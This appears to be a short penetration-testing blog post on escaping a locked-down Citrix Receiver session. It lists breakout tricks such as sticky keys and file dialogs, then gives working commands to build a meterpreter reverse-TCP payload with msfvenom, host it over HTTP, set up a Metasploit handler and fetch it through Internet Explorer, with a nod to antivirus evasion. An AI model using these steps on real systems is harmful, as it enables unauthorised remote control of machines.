Escaping Citrix Environment
Once you’re in Citrix Receiver you’d like to get a command line. Often domain admins disable access to
cmd but they forget about
There’re different ways to get what you want:
- Use Help (
F1button) and search for hyperlinks that would open in Internet Explorer.
- Use “Open file” dialogue and then browse to
powershelland use the right button to open the file.
- Use Task Manager to run arbitrary programs and applications.
- Use printer dialogues to open Windows Explorer windows.
- Use Internet Explorer Bookmark dialogues to open Windows Explorer windows.
- Put arbitrary paths in web browser address bars.
- You can use sticky keys (press
SHIFTbutton 5 times). I used it because I had
cmdand right button disabled.
Does it still work? Yes, it does!
Then go to the link called “Access Center” and type in a URL field:
Press enter and get your shell:
I had to download
meterpreter (some say that it’s better to use
Powershell Empire because it can avoid AVs) so I started a simple http server using
python -m http.server 80
To generate payload use
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.128.55 lport=4444 -f exe -o exploit.exe
To know which arch we have on the remote host we can use the following variable:
Create a handler on the attacker’s machine:
use multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST <local ip>
Then we start IE to download our payload:
Invoke-Item "C:\Program Files\Internet Explorer\iexplore.exe"
But it loads only start page and I was not able to change its behaviour (if you know how I’d like to know so email me in that case:). So instead of the previous command I could use the following:
It starts IE and goes to the URL. We download the payload and it gives us meterpreter shell.
Then we could use
background command to send our shell into the background and use some exploits or whatever. To get back to the session use
sessions -i <number>